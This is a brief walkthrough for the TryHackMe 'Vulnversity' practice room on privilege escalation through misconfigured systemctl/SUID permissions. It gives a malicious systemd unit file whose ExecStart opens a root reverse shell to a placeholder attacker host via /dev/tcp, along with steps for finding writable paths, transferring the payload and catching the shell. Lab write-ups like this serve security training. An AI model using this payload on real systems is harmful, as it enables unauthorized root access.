Vulnversity (Privilege Escalation)

Misconfigured Permissions — sudo/SUID

Practice box https://tryhackme.com/room/vulnversity

0. Prepare your payload root.service

[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'

[Install]
WantedBy=multi-user.target

1. Find files/directories that writable

find -type f -maxdepth 2 -writable

or

find -type d -maxdepth 2 -writable

2. Transfer the payload(There might be other ways)

Init the target listening to the port

Send the file to target

3. Start listening on the 9999

4. Execute the payload(assume the file is under /var/tmp)

5. The listening 9999 would give you the root

Expand Knowlege

https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory

https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/

https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49

Last updated

Was this helpful?